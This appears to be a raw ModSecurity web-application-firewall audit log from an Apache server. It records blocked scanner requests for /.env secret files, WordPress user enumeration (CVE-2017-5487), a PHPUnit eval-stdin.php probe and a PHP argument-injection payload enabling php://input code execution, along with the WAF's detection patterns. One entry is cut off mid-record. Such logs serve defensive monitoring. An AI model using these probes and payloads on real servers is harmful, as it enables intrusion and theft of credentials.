X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.53.16.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --381bbd55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --381bbd55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747363513829660 3146 (- - -) Stopwatch2: 1747363513829660 3146; combined=1400, p1=465, p2=903, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --381bbd55-Z-- --72971203-A-- [16/May/2025:09:55:10 +0700] aCapDse47ocjCGWTS4b4pwAAAFY 103.236.140.4 38996 103.236.140.4 8181 --72971203-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.74 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --72971203-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72971203-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747364110929960 873 (- - -) Stopwatch2: 1747364110929960 873; combined=390, p1=350, p2=0, p3=0, p4=0, p5=40, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72971203-Z-- --4a1e3304-A-- [16/May/2025:09:55:14 +0700] aCapEse47ocjCGWTS4b4qAAAAFc 103.236.140.4 39000 103.236.140.4 8181 --4a1e3304-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.74 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --4a1e3304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a1e3304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747364114152219 832 (- - -) Stopwatch2: 1747364114152219 832; combined=329, p1=290, p2=0, p3=0, p4=0, p5=39, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a1e3304-Z-- --aeb2a708-A-- [16/May/2025:10:01:58 +0700] aCaqpse47ocjCGWTS4b4vQAAAE8 103.236.140.4 39128 103.236.140.4 8181 --aeb2a708-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.74 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --aeb2a708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeb2a708-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747364518516626 925 (- - -) Stopwatch2: 1747364518516626 925; combined=331, p1=293, p2=0, p3=0, p4=0, p5=38, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeb2a708-Z-- --bc12f604-A-- [16/May/2025:10:02:01 +0700] aCaqqce47ocjCGWTS4b4vwAAAFQ 103.236.140.4 39132 103.236.140.4 8181 --bc12f604-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.74 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --bc12f604-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc12f604-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747364521610169 694 (- - -) Stopwatch2: 1747364521610169 694; combined=320, p1=288, p2=0, p3=0, p4=0, p5=32, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc12f604-Z-- --8e12b404-A-- [16/May/2025:10:02:19 +0700] aCaqu9e6THFz1hsaJaKPGwAAAAI 103.236.140.4 39136 103.236.140.4 8181 --8e12b404-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.74 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8e12b404-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e12b404-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747364539726239 863 (- - -) Stopwatch2: 1747364539726239 863; combined=327, p1=288, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e12b404-Z-- --dcd8ac5b-A-- [16/May/2025:10:02:22 +0700] aCaqvse47ocjCGWTS4b4wQAAAFY 103.236.140.4 39140 103.236.140.4 8181 --dcd8ac5b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.74 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --dcd8ac5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcd8ac5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747364542571385 696 (- - -) Stopwatch2: 1747364542571385 696; combined=289, p1=260, p2=0, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcd8ac5b-Z-- --234c6e48-A-- [16/May/2025:10:11:25 +0700] aCas3dhEtho3ciA0wege6QAAAJc 103.236.140.4 39252 103.236.140.4 8181 --234c6e48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --234c6e48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --234c6e48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747365085885535 953 (- - -) Stopwatch2: 1747365085885535 953; combined=389, p1=349, p2=0, p3=0, p4=0, p5=39, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --234c6e48-Z-- --bc502314-A-- [16/May/2025:10:13:48 +0700] aCatbNhEtho3ciA0wege8QAAAI8 103.236.140.4 39306 103.236.140.4 8181 --bc502314-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --bc502314-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc502314-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747365228574641 768 (- - -) Stopwatch2: 1747365228574641 768; combined=317, p1=281, p2=0, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc502314-Z-- --12716d64-A-- [16/May/2025:10:21:04 +0700] aCavIEE0LfP59mkCzg71XAAAAMA 103.236.140.4 39414 103.236.140.4 8181 --12716d64-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 152.200.143.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.200.143.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --12716d64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12716d64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747365664851044 2965 (- - -) Stopwatch2: 1747365664851044 2965; combined=1282, p1=465, p2=787, p3=0, p4=0, p5=29, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12716d64-Z-- --9f7fc652-A-- [16/May/2025:11:44:54 +0700] aCbCxte6THFz1hsaJaKPiwAAAAg 103.236.140.4 40688 103.236.140.4 8181 --9f7fc652-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --9f7fc652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f7fc652-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747370694774688 748 (- - -) Stopwatch2: 1747370694774688 748; combined=312, p1=274, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f7fc652-Z-- --c677cb2d-A-- [16/May/2025:11:55:39 +0700] aCbFS0E0LfP59mkCzg715QAAAMA 103.236.140.4 40894 103.236.140.4 8181 --c677cb2d-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.99.182.39 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.99.182.39 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c677cb2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c677cb2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747371339065879 884 (- - -) Stopwatch2: 1747371339065879 884; combined=355, p1=310, p2=0, p3=0, p4=0, p5=45, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c677cb2d-Z-- --32131f72-A-- [16/May/2025:12:01:53 +0700] aCbGwdhEtho3ciA0wegfSwAAAJM 103.236.140.4 41002 103.236.140.4 8181 --32131f72-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.5.36.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.5.36.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --32131f72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32131f72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747371713135804 3258 (- - -) Stopwatch2: 1747371713135804 3258; combined=1369, p1=499, p2=835, p3=0, p4=0, p5=35, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32131f72-Z-- --e49b325c-A-- [16/May/2025:12:04:12 +0700] aCbHTMe47ocjCGWTS4b5QAAAAFU 103.236.140.4 41070 103.236.140.4 8181 --e49b325c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.23.207 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.23.207 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e49b325c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e49b325c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747371852773128 921 (- - -) Stopwatch2: 1747371852773128 921; combined=433, p1=392, p2=0, p3=0, p4=0, p5=41, sr=154, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e49b325c-Z-- --ba33af1c-A-- [16/May/2025:12:17:05 +0700] aCbKUde6THFz1hsaJaKPrQAAABg 103.236.140.4 41246 103.236.140.4 8181 --ba33af1c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.127.36.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.127.36.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ba33af1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba33af1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747372625774054 3143 (- - -) Stopwatch2: 1747372625774054 3143; combined=1323, p1=460, p2=834, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba33af1c-Z-- --309b9179-A-- [16/May/2025:12:26:27 +0700] aCbMg8e47ocjCGWTS4b5XwAAAEg 103.236.140.4 41384 103.236.140.4 8181 --309b9179-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.12.230.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.12.230.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --309b9179-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --309b9179-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747373187157301 3515 (- - -) Stopwatch2: 1747373187157301 3515; combined=1495, p1=457, p2=1006, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --309b9179-Z-- --30bf1a21-A-- [16/May/2025:12:34:49 +0700] aCbOedhEtho3ciA0wegfbwAAAIY 103.236.140.4 41476 103.236.140.4 8181 --30bf1a21-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 79.124.58.198 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 79.124.58.198 X-Forwarded-Proto: http Connection: close Content-Length: 19 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/x-www-form-urlencoded --30bf1a21-C-- --30bf1a21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30bf1a21-H-- Message: Access denied with code 403 (phase 2). String match " --faa6df2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --faa6df2b-E-- --faa6df2b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747375205471615 4776 (- - -) Stopwatch2: 1747375205471615 4776; combined=3087, p1=497, p2=2556, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faa6df2b-Z-- --69adff21-A-- [16/May/2025:13:11:52 +0700] aCbXKNe6THFz1hsaJaKP9AAAABQ 103.236.140.4 42260 103.236.140.4 8181 --69adff21-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 165.22.110.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 165.22.110.186 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --69adff21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69adff21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747375912625568 854 (- - -) Stopwatch2: 1747375912625568 854; combined=330, p1=281, p2=0, p3=0, p4=0, p5=48, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69adff21-Z-- --a64d091c-A-- [16/May/2025:13:45:19 +0700] aCbe_9e6THFz1hsaJaKRCgAAABg 103.236.140.4 45912 103.236.140.4 8181 --a64d091c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 159.65.144.72 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 159.65.144.72 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a64d091c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a64d091c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747377919898592 685 (- - -) Stopwatch2: 1747377919898592 685; combined=295, p1=262, p2=0, p3=0, p4=0, p5=32, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" 